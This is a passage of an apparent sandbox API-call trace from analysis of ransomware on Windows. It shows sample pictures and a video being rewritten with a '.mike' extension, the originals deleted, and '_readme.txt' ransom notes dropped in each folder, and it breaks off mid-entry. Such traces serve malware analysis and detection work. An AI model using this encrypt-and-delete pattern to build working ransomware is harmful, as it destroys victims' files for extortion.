lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.098] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0163.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.100] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x7800 [0163.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.101] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xa000 [0163.102] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.103] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xc800 [0163.104] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.104] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xf000 [0163.105] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.106] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x11800 [0163.107] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.107] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x14000 [0163.108] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.109] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x16800 [0163.110] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.110] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x19000 [0163.111] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.112] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1b800 [0163.113] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.113] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e000 [0163.115] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.115] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x20800 [0163.123] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.124] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x23000 [0163.125] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.126] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x25800 [0163.127] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.128] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x28000 [0163.130] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.132] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.133] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.135] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.137] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.139] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.141] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.143] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.145] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.148] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.150] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.152] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.154] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.156] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.158] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.162] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.212] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.213] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.213] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", dwFileAttributes=0x80) returned 1 [0163.214] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg")) returned 1 [0163.220] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0163.222] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0163.223] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.mike", lpFilePart=0x0) returned 0x37 [0163.223] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0163.314] WriteFile (in: hFile=0x1c8, lpBuffer=0x2132744*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2132744*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0163.315] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.mike", lpFilePart=0x0) returned 0x37 [0163.315] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", dwFileAttributes=0x80) returned 1 [0163.316] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg")) returned 1 [0163.322] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0163.325] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0163.325] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.326] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpFilePart=0x0) returned 0x37 [0163.386] WriteFile (in: hFile=0x1c8, lpBuffer=0x2209738*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2209738*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0163.386] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.387] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.387] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", dwFileAttributes=0x80) returned 1 [0163.388] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg")) returned 1 [0163.393] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0163.395] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0163.395] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.mike", lpFilePart=0x0) returned 0x3a [0163.396] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpFilePart=0x0) returned 0x35 [0163.485] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.mike", lpFilePart=0x0) returned 0x3a [0163.485] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.mike", lpFilePart=0x0) returned 0x3a [0163.486] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", dwFileAttributes=0x80) returned 1 [0163.486] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg")) returned 1 [0163.493] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0163.495] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0163.495] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.mike", lpFilePart=0x0) returned 0x38 [0163.496] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpFilePart=0x0) returned 0x33 [0163.561] WriteFile (in: hFile=0x1c8, lpBuffer=0x210b368*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x210b368*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0163.562] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.mike", lpFilePart=0x0) returned 0x38 [0163.562] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.mike", lpFilePart=0x0) returned 0x38 [0163.563] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", dwFileAttributes=0x80) returned 1 [0163.563] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg")) returned 1 [0163.570] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0163.574] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.574] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0163.574] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0163.574] CoTaskMemFree (pv=0x508980) [0163.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0163.575] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV", lpFilePart=0x0) returned 0x1b [0163.576] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.577] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.577] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0163.577] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0163.578] CoTaskMemFree (pv=0x508980) [0163.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0163.578] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Recorded TV\\Sample Media", lpFilePart=0x0) returned 0x28 [0163.579] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.581] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.581] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0163.581] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0163.581] CoTaskMemFree (pv=0x508980) [0163.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0163.582] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos", lpFilePart=0x0) returned 0x16 [0163.583] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.584] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.584] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0163.584] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0163.585] CoTaskMemFree (pv=0x508980) [0163.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0163.585] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos", lpFilePart=0x0) returned 0x24 [0163.586] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0163.587] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0163.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.mike", lpFilePart=0x0) returned 0x36 [0163.588] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: 